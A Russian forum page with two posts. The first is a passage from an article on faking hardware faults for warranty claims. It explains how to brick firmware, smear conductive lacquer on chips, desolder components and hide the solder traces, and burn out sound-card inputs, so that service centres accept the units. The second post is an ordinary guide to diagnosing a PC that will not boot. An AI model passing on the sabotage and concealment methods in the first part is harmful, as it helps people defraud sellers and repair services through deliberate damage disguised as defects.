<!--coloro: aqua-->[color= aqua]<!--/coloro-->Необратимые способы<!--colorc-->[/color]<!--/colorc-->
Первый и самый эффективный способ — отключение питания девайса в момент перепрошивки. Как уже упоминалось, снять микросхему БИОСа с платы сидюка чаще всего весьма проблематично, так как в большинстве случаев она туда припаяна.Вследствие этого раскрыть заговор, то есть изобличить мошенника, практически невозможно. Для этого надо снять микросхему, подключить ее к программатору и проанализировать содержимое. Если даже кто‑то этим займется, то это не будет доказательством преступления, так как слет прошивки мог произойти из‑за каких‑либо глюков электроники. Через открытый лоток можно изуродовать механику привода открывания лотка — например, залив в ось шестеренки клея, однако есть большая вероятность, что с такой неисправностью по гарантии хакера завернут сразу и не раздумывая.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Видеокарта<!--colorc-->[/color]<!--/colorc-->
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Обратимые способы<!--colorc-->[/color]<!--/colorc-->
Существует огромное количество способов заставить видеокарту глючить и во всей красе демонстрировать целый букет неисправностей. Самый действенный способ — это эмулировать какую‑нибудь классическую неисправность — например, оперативной памяти. В этом случае у злодея есть возможность пойти программным путем, разогнав видеокарту до таких значений, чтобы она еще кое‑как функционировала, но уже глючила. Чтобы закрепить разгон, хакеру нужно прошить полученные значения в БИОС видюхи. Для этого он сливает с карты ее родной БИОС, подправляет одним из существующих редакторов и снова заливает на место. Как ты понимаешь, такой способ легко фиксится простой перепрошивкой, однако вряд ли с этим кто‑то будет заморачиваться. Злодей может поступить проще: просто убить БИОС левой прошивкой или отключить питание компа в тот момент, когда флешер этого делать не рекомендует. Восстановить БИОС видеокарты потом можно и на ощупь или с участием второй видюхи. Для более надежной пакости злодей использует все тот же проводящий лак, щедро разрисовав им выводы одной из микросхем памяти. В результате этого на экране монитора будут красоваться различные спецэффекты в виде посторонних символов и полосок.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Необратимые способы<!--colorc-->[/color]<!--/colorc-->
Тут открывается широкое поле для действий. Это первый обсуждаемый нами девайс, практически не имеющий защиты от внешних воздействий. Он, как правило, не обладает корпусом и содержит минимальное количество пластиковых частей. Это значит, что с помощью паяльника или термофена с него можно снять «лишние» запчасти. Для этого и нужен хороший флюс, так как хакер не имеет права оставить следы пайки и дать возможность злому сервисному инженеру завернуть девайс. Если ты когда‑нибудь внимательно разглядывал видеокарту, то не мог не заметить, что она имеет громадное количество различных элементов. При этом зачастую далеко не все разведенные на плате места под элементы заняты деталями, поэтому отсутствие одного-единственного компонента будет незаметно, но девайс все равно работать откажется. Обычно снимают элементы, расположенные с обратной стороны платы, на том месте, где установлен процессор. Тем самым повышается вероятность того, что злодей снимет критически важную деталь, а не какой‑нибудь фильтр. Также весьма чувствительна обвеска чипов оперативной памяти, после снятия которых данный чип пе рестанет корректно функционировать. Что-бы аккуратно удалить элемент, хакеру нужно сначала его прогреть паяльником или термофеном, а потом аккуратно потянуть пинцетом. После этого злодею нужно обязательно облагородить место вмешательства. Для этого поверхность смазывается флюсом и прогревается, в результате чего контактные площадки будут выглядеть так, будто там ничего и не было. Останется только смыть спиртом флюс. Неплохо срабатывает и способ с пьезо-элементом, но оперативная память таких вещей не любит. И, наконец, самый простой способ — отключить охлаждение видеокарты и помучить ее в таком состоянии. Правда, этот метод самый непредсказуемый — может сдохнуть процессор, а может, подгорит печатная плата, и в гарантию ее, естественно, не возьмут.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Звук<!--colorc-->[/color]<!--/colorc-->
<!--coloro: yellow-->[color= yellow]<!--/coloro-->]Обратимые способы<!--colorc-->[/color]<!--/colorc-->
Со звуковыми картами дела обстоят так же, как и с видео. Не все знают, что подавляющее число звуковух имеют собственный программируемый БИОС, который также злоумышленник может убить, только восстановить его бывает не так просто. Поэтому обычно применяют фантазию и немного лака.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Необратимые способы<!--colorc-->[/color]<!--/colorc-->
Злодей может попробовать сжечь процессор звуковой карты, резко подав на линейный или микрофонный входы мощный, сигнал — в прошлом так была сожжена ни одна звуковушка. При этом, как правило, повреждается не только сам вход, но и цепи, ответственные за выход, но, как к этому отнесутся в сервисном центре, остается только догадываться.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Материнская плата<!--colorc-->[/color]<!--/colorc-->
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Обратимые способы<!--colorc-->[/color]<!--/colorc-->
С мамкой хакер может делать все, что душе угодно, не особо боясь потерять гарантию. Причина проста до безобразия. Осмотреть всю печатную плату на предмет микроповреждений, отсутствия деталей и прочих хитрых модификаций очень сложно из‑за ее больших размеров. Конечно же, платы осматривают, но не под микроскопом и без каталога находящихся на ней элементов. На это способны только некоторые некрофилы с Митинского рынка и аналогичные деятели из мелких компьютерных фирм, которые теряют на этом свои деньги. В большинстве крупных фирм на это просто нет времени. Поэтому если на плате отсутствуют явные механические повреждения, то злодей может смело сдавать ее в гарантию. Програм- мно убить мать таким образом, чтобы можно было «откатить» неисправность, очень сложно. Порчей БИОСа тут не обойдется, так как это элементарно фиксится. Остается только токопроводящий лак. Его обычно наносят около жизненно важных узлов, например, возле БИОСа, тактовых генераторов, а также на нераспаянные участки платы. Безусловно, самым надежным и менее палевным способом является снятие некоторых элементов, но этот способ является обратимым только с оговоркой на хорошее паяльное оборудование и прямые руки, ведь поставить CMD-элемент на место намного сложнее, чем его снять.
<!--coloro: yellow-->[color= yellow]<!--/coloro-->Необратимые способы<!--colorc-->[/color]<!--/colorc-->
Из необратимых стоит выделить только демонтаж важных деталей, необходимых для работы платы. Лучше всего подходят различные кварцевые генераторы и элементы, стоящие на внутренней шине между мостами. Их отсутствие обеспечит полную неработоспособность платы. Впрочем, пьезоэлектрошок тоже подойдет. Чтобы избежать излишней подозрительности, злодей может попробовать убить какую‑либо отдельно взятую часть — например, контроллер оперативной памяти. Эта поломка будет выглядеть значительно правдоподобнее — плата просто будет орать благим матом, требуя вставить оперативную память. Ведь полная смерть у матерей наступает не так часто.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Периферия<!--colorc-->[/color]<!--/colorc-->
С убийством периферии все зависит отконкретной ситуации. Например, многие принтеры и большинство ЭЛТ-мониторов имеют специальные сервисные режимы, из‑за которых можно изуродовать девайс. В мониторах при помощи этих режимов
злодей может так исковеркать изображение, что вернуть исходные настройки будет практически невозможно. Эти настройки делаются на заводе при участии сложного оборудования, в домашних условиях, да и в условиях мелкого сервис-центра этого не исправить. Вход в это меню выполняется путем нажатия определенной комбинации кнопок, но для всех мониторов она разная. На некоторых мониторах, например Sony, ее вообще нет, и вход в сервисное меню выполняется через специальный data‑кабель с компьютера. С принтерами ситуация похожая, однако в бытовых дешевых принтерах подобные функции присутствуют редко, в основном это возможно на дорогих производительных моделях, предназначенных для офисов. То же самое относится и к другим девайсам, например к аппаратным dial up модемам. В них все настройки хранятся в памяти модема, с их помощью его можно привести в полностью неработоспособное состояние. Дело в том, что их настройки позволяют полностью изменить реакцию на линию связи, в определенных ситуациях модем просто перестанет видеть линию. Однако лечится это обычным возвратом к заводским настройкам.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Выводы<!--colorc-->[/color]<!--/colorc-->
Как видишь, злодей может без проблем угробить любой девайс. Большинство современных девайсов имеют свои внутренние микропрограммы, и если хорошо изучить подробности их конфигурирования и работы, то можно успешно эмулировать многие неисправности. Не стоит забывать, что в сервис-центрах также сидят грамотные люди, которых порой не так просто обдурить.

Kestrel
Активный участник
Сообщений: 3552
Зарегистрирован: 26 дек 2010, 12:22

Сообщение Kestrel » 28 апр 2009, 02:53

<span style="font-size: 18px"><span style="display: block; text-align: center"><!--coloro: red-->[color= red]<!--/coloro-->Что делать, если не грузится комп?<!--colorc-->[/color]<!--/colorc--></span></span>
<span style="font-style: italic">Автор статьи - -=lebed=- с forum.antichat.ru</span>
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->[intro]<!--colorc-->[/color]<!--/colorc--></span>
Мне надоело уже порядком отвечать на те или иные вопросы почему не грузится компьютер, поэтому я решил написать эту статью и собрать наиболее полную коллекцию причин и способов их устранения. Статья затрагивает в основном проблемы железа, т.е. когда комп не грузится совсем из-за неисправности компонентов, а не по причине неполадок ОС или проблем с загрузчиком, основана на личном 10-ти летнем опыте.
<span style="display: block; text-align: center">
<!--coloro: yellow-->[color= yellow]<!--/coloro-->[1. Компьютер "не заводится" совсем!]<!--colorc-->[/color]<!--/colorc--></span>
Т.е. при подаче питания не происходит ничего совсем! (ни стартуют куллеры, не горят светодиоды, отсутствует звук в динамике.)
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение:<!--colorc-->[/color]<!--/colorc-->
Как бы не было странным, я советую проверить напряжение 220в на подходе к БП. Бывают случаи банального плохого контакта штепселей до БП, выбитого автомата из-за включенного чайника и т.д. Т.е. обязательно убедитесь тестером что на штепселе, который вставляется в БП есть напряжение 220в. (Крайние контакты - ноль и фаза, средний - земля). На современных БП есть выключатель, проверьте так же и его, редко но бывает, и на нём пропадает контакт, либо он случайно отключен.
Далее, если с питанием всё ок, открываем системник, если есть светодиод на материнке и он горит - убеждаемся что питание приходит на плату с БП.
Потом обращаем внимание на кнопку, которая должна замкнуть контакты на материнке и запустить БП. А точнее отсоединяем её и пробуем перемкнуть контакты отвёрткой прямо на материнке.(маркируются PWRSW) Кнопки как правило выходят из строя редко, но бывают западают.
Если с кнопкой всё впорядке, а комп так же не подаёт признаков жизни, то я сразу советую попробовать подставить другой БП, потому как с большой вероятностью можно утвержать что проблема в нём, при этом обязательно советую отключить все дисковые устройства.
Если всё заработало, подсоединяем (по 1 шт.) отключенные ранее устройства, выявляя проблемное. Если всё вместе работает, то либо меняем БП на новый, либо ремонтируем неисправный (обычно горят транзисторы, диоды на входе БП, тут на ачате была статья о ремонте БП)
<span style="display: block; text-align: center">
<!--coloro: yellow-->[color= yellow]<!--/coloro-->[2. Компьютер пытается "завестись".]<!--colorc-->[/color]<!--/colorc--></span>
Т.е. при подаче питания сразу происходит последующее отключение питания. Куллеры начинают вращатся и тут же перестают.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Возможные причины:<!--colorc-->[/color]<!--/colorc-->
<!--coloro: lime-->[color= lime]<!--/coloro-->а) Напряжение просаживается по каким либо линиям питания (перегрузка по току) и срабатывает защита.<!--colorc-->[/color]<!--/colorc-->
Вполне возможно какое либо из устройств неисправно и просаживает питание либо перегружает шины данных по току. (Недавний мой пример - cгоревшая видеокарта 8800GT - перегрузка по шине PCI-E либо по дополн. линиям питания.)
В этом случае в современных БП срабатывает защита от перегрузки и происходит отключение питания.
<!--coloro: lime-->[color= lime]<!--/coloro-->б) Перекос напряжений<!--colorc-->[/color]<!--/colorc-->, допустим +12,8в и -11,2в или +5,5в и -4,5в (Это может быть следствие просадки - как правило наблюдается у дешовых китайских БП).
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение:<!--colorc-->[/color]<!--/colorc-->
- Выявляем устройство причину: Отключаем все возможные устройства: HDD, CD/DVD-приводы, платы расширения, USB-хабы (даже воткнутая неисправная флешка может быть причиной). Оставляем только материнку, проц, память. Если не помогло, то снимаем и память. Если результата нет, вынимаем материнскую плату и пробуем запустить на столе, вне корпуса. Если запуск произошёл, то скорее всего на материнке есть микротрешина (часто возникает на материнках для процев AMD в районе процессорного разъёма). Как правило эту неисправность сложно устранить в домашних условиях, можно попробовать лишь погреть материнку, предварительно сняв проц, горячим воздухом паяльной станции. Кардинальное решение - замена материнки.
- Если результата нет - внимательно осмотрите плату на предмет вспухших конденсаторов обвязки (круглые бочёнки). Вывает что электролит выкипает (высыхает) и в конденсаторе сильно возрастает ток утечки (начинает работать как резистор) тем самым просаживая напряжение и не обеспечивая достаточной фильтрации. Решение - замена конденсаторов на аналогичные (можно взять с другой неисправной платы). Аккуратно - не перепутайте + и - при установке.
- Если внешне всё в порядке, то остаётся 3 возможных неисправных компонента: БП, Проц, Материнская плата.
В этом случае, я так же советую попробовать подставить другой БП, если всё заработает, то значит проблема в нём (скорее всего в выходных цепях БП), либо меняем БП, либо ремонтируем.
- Не помогло с рабочим БП - меняем проц на заведомо рабочий. (за свой 10-ти летний опыт я так и не видел сгоревшего процессора - наверно везло ;-)
- Не помогло - не исправна материнская плата - меняем.
Т.е. из четырёх, самых главных компонентов, вероятный порядок выхода из строя следующий:
1. БП (Очень часто используется дешовый некачественный китайский БП)
2. Материнская плата.
3. Память.
4. Процессор.
Тут отдельно остановлюсь на старых БП - там на входе был попросту предохранитель (иногда впаянный) который при увеличении нагрузки попросту сгорал. В этом случае перед установкой нового - так же следует найти причину (КЗ, либо перегрузки). Были случаи выхода из строя БП из-за неисправного (сгоревшего) HDD например, причём из-за него сгорело аж два БП (я так понял не имеющих защиты), так что будте аккуратнее.
<!--coloro: lime-->[color= lime]<!--/coloro-->в) Перегрев процессора.<!--colorc-->[/color]<!--/colorc-->
Некоторые процессоры не запускаются без охлаждающего радиатора совсем (часто от AMD). Т.е. причина отскочившая защёлка радиатора, либо одного! крепления к материнской палате (был реальный случай), либо плохой термоконтакт с ним.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение:<!--colorc-->[/color]<!--/colorc-->
Открываем системник, проверяем радиатор, ставим на его место, если отошёл, при необходимости используем термопасту.
Вообще перегрев (не достаточное охлаждение - это отдельная тема) проверьте чтоб все радиаторы были на месте (южный и северный мост).
<!--coloro: lime-->[color= lime]<!--/coloro-->г) Вы используете мощную видеокарту (а может и две в SLI или Cross) и она(и) требуют отдельной(ых) линии(й) питания 12в.<!--colorc-->[/color]<!--/colorc--> В этом случае БП может попросту не вытягивать эту нагрузку (потребление современных видеокарт доходит до 200Вт.) Если Вы счастливый владелец двух видюх, то наверняка Вы позаботились о мощном БП >650Вт. и этой проблемы у Вас быть не должно (такие БП имеют отдельные линии питания для видеокарт и я надеюсь Вы использовали их верно). Если у Вас одна видеокарта с доп. питанием и обычный БП (400-430Вт.) то видеокарту следует запитать двумя! свободными линиями питания (отдельные провода из БП с обычным плоским разъёмом на конце) используя специальный переходник (поставляется с видюхой). На эти линии не рекомендуется подключать параллельно ещё что-либо (HDD, CD/DVD и др.)
<!--coloro: lime-->[color= lime]<!--/coloro-->д) Плохой контакт на разъёме питания материнской платы<!--colorc-->[/color]<!--/colorc--> (20pin, 24pin). Было и такое: Отверстия разъёма "мамы" БП были большего диаметра чем штырьки "папы" на материнке, вследствии чего из-за плохого контакта начал отгорать разъём (почернел). Неисправности такого плана, как правило выявляются ударом по системному блоку. А так же можно заметить по просадке напряжения (сопротивление в месте плохого контакта может достигать нескольких ОМ).
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение: <!--colorc-->[/color]<!--/colorc-->Отсоединяем разъём, маленьким шилом деформируем контакты "мамы" разъёма БП, уменьшая диаметр, превращая окружность в например в пи... т.е. элипс ну вообщем вы поняли проблему Для наглядности вот так: O -> ()
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->[3. Заводится, нет звуков, чёрный экран]<!--colorc-->[/color]<!--/colorc--></span>
- Тут мы уже можем померять напряжения БП тестером и убедивщись в отклонениях (или их отсутствии) более 10-15% по линиям +5В,-5В, +12В, -12В начинаем выявлять причину просадки напряжения - отсоединяем все устройства и т.д. т.е. алгоритм действий такой же как и во 2 пункте.
Вообще разница этих пунктов только в том, что один БП имеет защиту от перегрузки, другой нет, либо один БП более мощный и порог срабатывания защиты другой. Т.е. БП запускается, а напряжения для работы компонентов, устройств всё равно недостаточно из-за просадки.
- Неверные установки биос. Часто происходит, если вы пытались разогнать систему (проц, память, шины и т.д) и в итоге не может отработать даже POST (процедура самодиагностики).
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение:<!--colorc-->[/color]<!--/colorc--> открываем системник, вытаскиваем батарейку (обычно кругляк размером с 2 рубля и напряжением 3,3В.) Перемыкаем контакты к которым цепляется батарейка на материнской плате отвёрткой на несколько секунд, тем самым сбрасывая установки BIOS в заводские. Пробуем запустить без батарейки. Потом ставим батарейку на место и пробуем грузится. Проверьте напряжение батарейки. Были случаи не запуска компа из-за севшей (осталось 1,7в) батарейки.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->[4. Отрабатывает процедура POST (самодиагностики).]<!--colorc-->[/color]<!--/colorc--></span>
Т.е. динамик компа начинает издавать некоторые звуки, хотя вывода на экран может и не быть.
Сигналы для разных BIOS и материнских плат могут отличаться, поэтому сначала смотрим по ману от материнки какой у нас BIOS, а потом смотрим расшифровку сигналов, приведу некоторые из популярных:
<!--coloro: lime-->[color= lime]<!--/coloro-->AMI BIOS:<!--colorc-->[/color]<!--/colorc-->

<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 24em"><pre>2к Ошибка четности ОЗУ3к Ошибка в первых 64 кБ ОЗУ4к Неисправность системного таймера5к Неисправность CPU (процессора)6к Накрылся контроллер клавиатуры7к Накрылась системная плата8к Проблемы с памятью видеокарты9к Ошибка контрольной суммы BIOS10к Невозможна запись в CMOS11к Неисправен кэш, расположенный на системной плате1д+1к Проблемы с блоком питания1д+2к Проблемы с видеокартой1д+3к То же1д+8к Не подключен монитор</pre></div></div></div><!--coloro: lime-->[color= lime]<!--/coloro-->AWARD BIOS:<!--colorc-->[/color]<!--/colorc-->
<div class="code-box"><strong class="legend">Код:</b><div class="blockcode"><div class="scrollbox" style="height: 16.5em"><pre>2к Мелкие ошибки (как правило это проблемы в CMOS Setup или с системной платой.)3д Ошибка контроллера клавиатуры1д+1к Ошибки в ОЗУ1д+2к Ошибка видеокарты1д+3к Ошибка инициализации клавиатуры1д+9к Ошибка при чтении из ПЗУк, повторяющийся Неисправен блок питанияд, повторяющийся Проблемы с ОЗУнепрерывный Неисправен блок питания</pre></div></div></div>к - короткий сигнал.
д - длинный.
На практике не всегда вообщем-то стоит доверять этим сигналам, потому как одновременно может быть две или более неисправности и тут всё зависит от того как функционирует процедура POST, т.е. какую неисправность она обнаружит сначала.
<span style="display: block; text-align: center"><!--coloro: yellow-->[color= yellow]<!--/coloro-->[5. Отрабатывает процедура POST - один короткий сигнал - всё ок, но негрузится]<!--colorc-->[/color]<!--/colorc--></span>
Даже при одном коротком сигнале - (всё работает нормально) компьютер может не грузится.
Как правило это может произойти из-за не верных установок в BIOS.
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение: <!--colorc-->[/color]<!--/colorc-->заходим в BIOS возвращаем установки обратно (если меняли перед этим) либо сбрасываем все установки в заводские (по-умолчанию).
На современных платах от Asus есть система интеллектуального разгона, которая может не совсем верно работать (выставлять напряжения и частоты) в режиме auto. Поэтому рекомендуется отключить её, выставив режимы в BIOS либо manual либо disable. Иногда стоит задать явные частоты памяти, процессора, шины и т.д. а не надеятся на режим auto. Пример: оперативная память определяющаяся как работающая на частоте 800 но на самом деле при этом не корректно работает и при этом нормально работающаяя на 667. Вообщем задавая явные верные установки, а не auto Вы увеличивайте шансы на успешную загрузку и дальнейшую стабильную работу системы.
<!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="display: block; text-align: center">[6. Проблемы загрузки ОC]<!--colorc-->[/color]<!--/colorc--></span>
Остановлюсь вкраце и на этом, потому как это уже в большей степени не проблемы железа (исключение не исправный HDD, либо другое устройство загрузки).
<!--coloro: lime-->[color= lime]<!--/coloro-->- не исправный HDD<!--colorc-->[/color]<!--/colorc--> (не определяется и т.п.)
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение: <!--colorc-->[/color]<!--/colorc-->Грузимся с Live-CD - тестируем HDD (имхо лучшая прога MHDD4) выявляем неисправность, обычно либо контроллер, либо поверхность блинов. Как правило решение для устранения неисправности - замена HDD на исправный. Если ценна инфа на винте - можно попробовать отдать на восстановление в специализированную фирму.
<!--coloro: lime-->[color= lime]<!--/coloro-->- отсутсвует загрузчик, повреждена MBR и т.д.<!--colorc-->[/color]<!--/colorc-->
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение: <!--colorc-->[/color]<!--/colorc-->Грузимся с установочного диска ОС (для винды выполняем fixmbr, fixboot если стандартный загрузчик).
Если используется не стандартный мультизагрузчик - ставим его заного.
<!--coloro: lime-->[color= lime]<!--/coloro-->- не грузится ОС, загрузчик на месте.<!--colorc-->[/color]<!--/colorc--> Это уже проблемы самой Операционной системы (повреждённые системные файлы, файлы драйверов, проблемные драйвера, вирусы и т.д.)
<!--coloro: aqua-->[color= aqua]<!--/coloro-->Устранение:<!--colorc-->[/color]<!--/colorc--> Восстановление системы (различные способы), как кардинальный способ - загрузка с CD(DVD) и переустановка ОС на чистый переразбитый и отформатированный диск.
<!--coloro: yellow-->[color= yellow]<!--/coloro--><span style="display: block; text-align: center">[заключение]<!--colorc-->[/color]<!--/colorc--></span>
Конечно тут описаны не все причины проблемы не запуска компьютера, но это наиболее частые и встречаемые мной на практике, статья возможно будет дополнена и доработана. Главное определён алгоритм действий. Иногда бывает обидно разобрать весь комп и только потом выявить причину плохого контакта в розетке. Не тратьте своё время. Начинайте всегда сначала: проверьте напряжение питания (можно обойтись и без тестера, подключив к примеру, монитор к сетевому кабелю 220В, которым питается системник. Не забывайте про доп. питание проца на материнцкой плате (4 или 8 pin), дополн. питание видеокарт (6pin). Не перегружайте линии питания (запитывайте разные устройства с разных линий). Плохое питание - как правило основной источник большинства проблем с запуском компьютера, на втором месте перегрев (плохое охлаждение), далее неисправность устройств (HDD, Видеокарта, CD/DVD-приводы, память, материнка и т.д.)
P.S. спец. для Ачата из личного опыта.


Вернуться в «Частная Библиотека»

Кто сейчас на форуме

Количество пользователей, которые сейчас просматривают этот форум: нет зарегистрированных пользователей и 1 гость